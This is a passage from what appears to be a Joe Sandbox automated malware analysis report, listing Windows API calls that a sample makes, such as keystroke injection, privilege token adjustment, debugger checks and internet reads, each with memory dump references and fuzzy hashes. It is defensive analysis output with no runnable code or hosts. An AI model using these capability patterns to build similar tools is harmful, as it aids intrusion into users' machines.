          • Part of subcall function 001FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00223303,?), ref: 001FCE8A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
        • String ID:
        • API String ID: 1991900642-0
        • Opcode ID: bd5a9bc519283d7e5140ad1e66b5817f6fff99cb999b64a0d054f6ca9fad1681
        • Instruction ID: 651879bf56cf03d3fdf0a25849e340062bb8b2bcc77f0ee7d9728ed07d6903aa
        • Opcode Fuzzy Hash: bd5a9bc519283d7e5140ad1e66b5817f6fff99cb999b64a0d054f6ca9fad1681
        • Instruction Fuzzy Hash: E0517A71508740AFD310EF25D886A6FBBE8FF99744F40492DF589972A2EB30D944CB92
        APIs
        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0024AAAC
        • SetKeyboardState.USER32(00000080), ref: 0024AAC8
        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0024AB36
        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0024AB88
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: KeyboardState$InputMessagePostSend
        • String ID:
        • API String ID: 432972143-0
        • Opcode ID: 00ec61882b5a5daffed99fa8f4ce3b084c4222fed7259b3b1c8d880534dd4232
        • Instruction ID: ba6b275a216537693cfaab1e7cc3f56d760c817d4bfefda7112f3a8a02a28ede
        • Opcode Fuzzy Hash: 00ec61882b5a5daffed99fa8f4ce3b084c4222fed7259b3b1c8d880534dd4232
        • Instruction Fuzzy Hash: 65313D30AE0209AEFF3DCF64CC05BFA77A6EB64314F14421AF585561D0D3B589A1C752
        APIs
        • InternetReadFile.WININET(?,?,00000400,?), ref: 0025CE89
        • GetLastError.KERNEL32(?,00000000), ref: 0025CEEA
        • SetEvent.KERNEL32(?,?,00000000), ref: 0025CEFE
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorEventFileInternetLastRead
        • String ID:
        • API String ID: 234945975-0
        • Opcode ID: 6ceec00b144e71c3d9675e5e497b5ebe1e30bc22aa5bbfa89143924e3310b3e5
        • Instruction ID: a9c4625f8d733bf2c5314e915d81a87604c59ce6f93fbb2c910324eea678d998
        • Opcode Fuzzy Hash: 6ceec00b144e71c3d9675e5e497b5ebe1e30bc22aa5bbfa89143924e3310b3e5
        • Instruction Fuzzy Hash: D821F1B15103069FDB20CF65D949BA777FCEB10315F20441EE946E2151E770ED58CB58
        APIs
        • FindFirstFileW.KERNEL32(?,?), ref: 00255CC1
        • FindNextFileW.KERNEL32(00000000,?), ref: 00255D17
        • FindClose.KERNEL32(?), ref: 00255D5F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Find$File$CloseFirstNext
        • String ID:
        • API String ID: 3541575487-0
        • Opcode ID: 5f857671743d14fbf9cdab75c396cbeb66fab528a273e56296773b7e2843be02
        • Instruction ID: af10e72a3b1d324ba63c778d6a4c435339c40f01d7f6c41e76e8beabccbcebc1
        • Opcode Fuzzy Hash: 5f857671743d14fbf9cdab75c396cbeb66fab528a273e56296773b7e2843be02
        • Instruction Fuzzy Hash: C2518A35614A029FC714CF28C4A4A9AB7F4FF49324F14855EE95A8B3A2CB30ED59CF91
        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0021271A
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00212724
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00212731
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 2bb1f8668870df62cf5b9c6df51976fcbb6d44a0dc06ee3e110a1ef98e0f9362
        • Instruction ID: a8298fee9d1ce68c6f00dd94779f338f9361b9b83385f36bf7f981d75a44e03f
        • Opcode Fuzzy Hash: 2bb1f8668870df62cf5b9c6df51976fcbb6d44a0dc06ee3e110a1ef98e0f9362
        • Instruction Fuzzy Hash: 2E31D5749113289BCB21DF68DC887DDB7B8AF18310F5041EAE80CA72A1EB309F958F45
        APIs
        • SetErrorMode.KERNEL32(00000001), ref: 002551DA
        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00255238
        • SetErrorMode.KERNEL32(00000000), ref: 002552A1
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorMode$DiskFreeSpace
        • String ID:
        • API String ID: 1682464887-0
        • Opcode ID: a7c61dc76481fb97ecaa7dd7ea304a69d805914ebcee41de1b5853cfccfef574
        • Instruction ID: da70eaa79402d0adfb72432ab76573e160a93110662492b4694a348d67ff13c9
        • Opcode Fuzzy Hash: a7c61dc76481fb97ecaa7dd7ea304a69d805914ebcee41de1b5853cfccfef574
        • Instruction Fuzzy Hash: F6314F75A10518DFDB00DF54D898EADBBB4FF49314F148099E8099B362DB31E856CB90
        APIs
          • Part of subcall function 001FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00200668
          • Part of subcall function 001FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00200685
        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
        • GetLastError.KERNEL32 ref: 0024174A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
        • String ID:
        • API String ID: 577356006-0
        • Opcode ID: 4a255b0350a20feb9a85e6d4f3efd2c2f7f9bd09bef54fdb5c447a48b5cd531e
        • Instruction ID: a932103579dca727ad905edc04bf862e17b0f0a3cb95a3f4daf772a2242caef7
        • Opcode Fuzzy Hash: 4a255b0350a20feb9a85e6d4f3efd2c2f7f9bd09bef54fdb5c447a48b5cd531e
        • Instruction Fuzzy Hash: E911C1B2414309AFD7189F64EC86E6AB7BDEF44714B20852EE05657241EBB0FC918A60
        APIs
        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024D608
        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0024D645
        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024D650
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseControlCreateDeviceFileHandle
        • String ID:
        • API String ID: 33631002-0
        • Opcode ID: f776d3be963d7daedbc3774399305a32368b4b3bcebdf9d1eb668b2a76ffea73
        • Instruction ID: 61abf71a7a905ff8a439f419700deb4dc68bc80e41ba39f68664cc0625a068f9
        • Opcode Fuzzy Hash: f776d3be963d7daedbc3774399305a32368b4b3bcebdf9d1eb668b2a76ffea73
        • Instruction Fuzzy Hash: 9B116575E05228BFDB148FA9EC49FAFBFBCEB45B50F104165F908E7290D6704A058BA1
        APIs
        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0024168C
        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002416A1
        • FreeSid.ADVAPI32(?), ref: 002416B1
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AllocateCheckFreeInitializeMembershipToken
        • String ID:
        • API String ID: 3429775523-0
        • Opcode ID: 2f5839f780ea1ab41441d27d03dbab856b5ac95ad1163f0b45c5d6cb79c463ba
        • Instruction ID: acbde2468cb4ce9f577f7d0043cd45e869c855a2f16fae6196cd6285a9102eb5
        • Opcode Fuzzy Hash: 2f5839f780ea1ab41441d27d03dbab856b5ac95ad1163f0b45c5d6cb79c463ba
        • Instruction Fuzzy Hash: CBF0F471950319FBDB00DFF4AC89EAEBBBCFB08604F504565E501E2181E774AA848BA0
        APIs
        • GetCurrentProcess.KERNEL32(00000003,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002,00000000,?,002128E9,00000003), ref: 00204D09
        • TerminateProcess.KERNEL32(00000000,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002,00000000,?,002128E9,00000003), ref: 00204D10
        • ExitProcess.KERNEL32 ref: 00204D22
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: 71c26a2eb7c9619d8a067a321df6f37ea257658018f1b75c851d73a06d7a0816
        • Instruction ID: 8b6315ae938c0dec700251bfa539c8adc369d0546680c83f911b1d91df24ae01
        • Opcode Fuzzy Hash: 71c26a2eb7c9619d8a067a321df6f37ea257658018f1b75c851d73a06d7a0816
        • Instruction Fuzzy Hash: C2E0B671010248BBCF11BF64ED0DA583B6AEB45785B208058FD099A173CB35DDA2CA80
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: /
        • API String ID: 0-2043925204
        • Opcode ID: 7757c26dd8dedab0441df7beca3cf94d6dad586abf646411d3925acf68952cfe
        • Instruction ID: b3b174ea77ef3291e816ad06333578448d73d1b84368fcdf64a6da01fa7545ec
        • Opcode Fuzzy Hash: 7757c26dd8dedab0441df7beca3cf94d6dad586abf646411d3925acf68952cfe
        • Instruction Fuzzy Hash: 7941367A950219AFCB24AFB9DC48EFB77B8EB94314F2042A9F915C7180E6709DD1CB50
        APIs
        • GetUserNameW.ADVAPI32(?,?), ref: 0023D28C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: NameUser
        • String ID: X64
        • API String ID: 2645101109-893830106
        • Opcode ID: 98e1c2f0fd2ba1abd1232ca1981094747416c9bafc6d18866b63d04b5c6f7bd6
        • Instruction ID: ded7fa040df7b71f90ab100ca101d5fb9d53cf5348cce6269361e506b12e5993
        • Opcode Fuzzy Hash: 98e1c2f0fd2ba1abd1232ca1981094747416c9bafc6d18866b63d04b5c6f7bd6
        • Instruction Fuzzy Hash: 1FD0C9B481111DEADF94CBA0EC88DEAB37CBB04305F100155F506A2000DB7095488F10
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
        • Instruction ID: 53c0826c62041fe1241f46f99fb7e3d624f6f0c1f357656dc1653909ced9dd21
        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
        • Instruction Fuzzy Hash: CC022EB1E1021A9FDF14CFA9C8806ADFBF5FF48324F25426AD819E7385D730A9518B84
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: Variable is not of type 'Object'.$p#+
        • API String ID: 0-4251930221
        • Opcode ID: 15b380c2592c3c2ed9d7439e4965b66190b4c38ffa261e1501e4805f1262a0ab
        • Instruction ID: a8cf847a7df903bfdff47f8bc3e2313b1988d84e8a173d86115066f596c30962
        • Opcode Fuzzy Hash: 15b380c2592c3c2ed9d7439e4965b66190b4c38ffa261e1501e4805f1262a0ab
        • Instruction Fuzzy Hash: 0232BD70910659DFCF18DF95CC90AEDB7B5FF14304F248059E806AB292DB75AE46CBA0
        APIs
        • FindFirstFileW.KERNEL32(?,?), ref: 00256918
        • FindClose.KERNEL32(00000000), ref: 00256961
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Find$CloseFileFirst
        • String ID:
        • API String ID: 2295610775-0
        • Opcode ID: 45adb710c4bdeafadc9175657efa0ae4eb1237ef2c3b4fdb9d8f1a3addbc9e3b
        • Instruction ID: d9512208cec76d9294ee6febe6f91476032f0dcf20f95e7cf89f3a912e07dbb5
        • Opcode Fuzzy Hash: 45adb710c4bdeafadc9175657efa0ae4eb1237ef2c3b4fdb9d8f1a3addbc9e3b
        • Instruction Fuzzy Hash: 9011D3316146419FC710CF29D888A1ABBE0FF84329F54C69DE8698F2A2CB30EC45CB91
        APIs
        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00264891,?,?,00000035,?), ref: 002537E4
        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00264891,?,?,00000035,?), ref: 002537F4
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorFormatLastMessage
        • String ID:
        • API String ID: 3479602957-0
        • Opcode ID: 63fae263219c9774c957cd258340a48fd537af178a6da0513d4ac69ba0fd6fcf
        • Instruction ID: 24dc457e0d990aebfef5c36ed0848dcdc18a1226210534378b6187108f8f1cb5
        • Opcode Fuzzy Hash: 63fae263219c9774c957cd258340a48fd537af178a6da0513d4ac69ba0fd6fcf
        • Instruction Fuzzy Hash: B1F0EC706143253AE72057765C4DFDB769DDFC4761F100165F909D3281D9705944C7B0
        APIs
        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0024B25D
        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0024B270
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: InputSendkeybd_event
        • String ID:
        • API String ID: 3536248340-0
        • Opcode ID: f5a48fb19f96073b88f854416b1d757d19890c12481bfeee0ee48bb00d8cc80a
        • Instruction ID: c4c2f8eaf7d7675ee4a9024c014bf9fad646d3a770a5495596d9b44f11869c91
        • Opcode Fuzzy Hash: f5a48fb19f96073b88f854416b1d757d19890c12481bfeee0ee48bb00d8cc80a
        • Instruction Fuzzy Hash: ABF01D7181424EABDB05DFA0D805BAE7BB4FF04305F108009F955A5191D7B9C651DF94
        APIs
        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002411FC), ref: 002410D4
        • CloseHandle.KERNEL32(?,?,002411FC), ref: 002410E9
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AdjustCloseHandlePrivilegesToken
        • String ID:
        • API String ID: 81990902-0
        • Opcode ID: e743a1f39b141e377774afff8757fcd7354324f0836935ef4e9a1f6adda0cfbb
        • Instruction ID: d1e4af27a79f8c7c3e4058147912bdfa9cd1338328b856b179a0bae55d0affa6
        • Opcode Fuzzy Hash: e743a1f39b141e377774afff8757fcd7354324f0836935ef4e9a1f6adda0cfbb
        • Instruction Fuzzy Hash: 7EE0BF72018611AEF7252B61FC09E7777A9EF04310B24882DF5A5804B1DBA26CE1DB50
        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00216766,?,?,00000008,?,?,0021FEFE,00000000), ref: 00216998
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: c0b24aef1377c3d1b8a86972f90c344ed137c8cf9cea0f3f970501c8a61421f2
        • Instruction ID: 3c7a9d8d68baabccc0f8aefb65fae520d41a6be5986b66187207e21ee07c63d1
        • Opcode Fuzzy Hash: c0b24aef1377c3d1b8a86972f90c344ed137c8cf9cea0f3f970501c8a61421f2
        • Instruction Fuzzy Hash: E1B14D31520609DFD715CF28C48ABA97BE0FF55364F29C658E899CF2A2C335D9A5CB40
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
